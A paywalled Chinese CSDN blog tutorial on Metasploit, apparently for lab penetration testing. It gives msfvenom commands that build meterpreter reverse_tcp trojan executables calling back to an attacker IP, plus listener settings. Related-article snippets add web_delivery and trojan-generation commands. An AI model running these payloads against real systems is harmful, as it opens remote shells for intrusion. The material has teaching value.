MSF从上线到提权

最新推荐文章于 2024-05-28 23:28:58 发布
最新推荐文章于 2024-05-28 23:28:58 发布
阅读量1k 收藏 4
点赞数 1
文章标签: 渗透测试 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53087192/article/details/112315943
版权

环境

攻击机:kali
ip:192.168.232.129
被攻击机:win7
ip:192.168.232.140

MSF木马生成

windows_x86_payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.129 LPORT=4444 -f exe > shell.exe

windows_x64_payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.129 LPORT=4444 -f exe > shell.exe

对应系统生成,x86在64位系统上也能用,但有时一些模块使用会出错。

设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.232.129
set lport 4444
exploit

在这里插入图片描述
在被攻击机上运行木马,上线
在这里插入图片描述
进行进程迁移&#

最低0.47元/天 解锁文章
amd6700k
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2511
一条命令上线MSF(Metasploit)-web_delivery模块
上线MSF(Metasploit)的几种常见方式
qq_46258964的博客
04-14 9264
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
内网安全--隧道技术-MSF上线本地
最新发布
金灰的博客
05-28 919
免责声明:本文仅做技术交流与学习...
MSF上线
weixin_51151498的博客
03-16 1088
MSF上线
【内网安全】代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
今天是几号的博客
03-18 1484
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发。注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马。SocksCap Proxifier ProxyChains等。忽略细节,将msf_7777放置windows 7上,直接上线。#网络通讯-MSF&CS-路由添加&节点建立。#控制上线-MSF&CS-协议生成&正反连接。监听器:bind_tcp port。操作:代理转发-Socks代理。msf 内网流量转发代理。cs 内网流量转发代理。
记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面。
随心所欲不逾矩
02-27 810
前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境部署一个Windows7系统,在这个系统上把finecms这个应用部署上去。把finecms安装之后,和客户沟通,把这个应用的地址映射到公网上去。2,其次,没有条件的话,自己在在wmware上装个虚拟机部署上去也行。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
linux系统安装msf的过程详解
09-14
- `msfupdate`:更新MSF到最新版本。 - `msfvenom`:生成各种恶意代码,如在示例中生成了一个Windows的Meterpreter反向连接payload。 当使用`msfvenom`生成payload时,务必注意设置`LHOST`为你自己的IP地址。如果是...
无需公网IP!CloudFlare Tunnel内网穿透实现内网MSF上线
miskote的博客
01-10 2148
通常想在内网MSF实现主机上线需要一个公网IP地址做内网穿透,但是租用VPS太贵了而且隐匿性不强。而常用的内网穿透软件有frp、nps、花生壳等,经过测试都不好用。无意间发现CloudFlare提供了免费的内网穿透和CDN代理,既简单又隐蔽,确实好用。
内网渗透—Socks代理协议&主机不出网&CS-MSF控制上线
2301_76227305的博客
05-22 1197
那么什么是代理呢,我们本地可以直接访问windows server2008,无法直接访问win7。但是windows server2008可以直接访问win7,因为他们有同一网段的ip嘛。那么我们可以拿到windows server2008控制权,然后让它转发我们本地的流量到win7,那么server2008就充当了我们访问win7的代理。例如,有个包裹要从广州到深圳,但是包裹自己到达不了目的地,那么我们可以让快递公司代替我们把包裹送到深圳,此时快递公司就充当我们的代理。
msf 上线方法
qq_45951598的博客
06-18 1179
首先选中模块 use exploit/multi/script/web_delivery root@kali:~# msfconsole msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set target 2 target => 2 msf exploit(web_delivery) > set payload windows/x64/meterpreter/revers
(记录向)使用MSF的web_delivery模块上线
daxi0ng的博客
11-30 1403
前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。 目标环境: Centos6.5 1、选择exploit/multi/script/web_delivery模块 2、选择目标系统,我这里选择Linux 3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp , 4、本机监听一下 5、运行,生成一条命令 6、目标机器执行上线。 7、获取一个友好的交互界面。python -c 'import ...
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
渗透测试之Metasploit
11-20
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
MSF生成windows木马
lenkee的博客
10-22 1万+
msfvenommsfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
msf提权linux
03-30
Metasploit Framework(简称MSF)是一款广泛使用的渗透测试工具,它提供了丰富的模块和功能,其中包括了一些用于在Linux系统上进行提权的模块。提权是指通过漏洞或者其他手段获取更高权限的过程。 在Metasploit ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值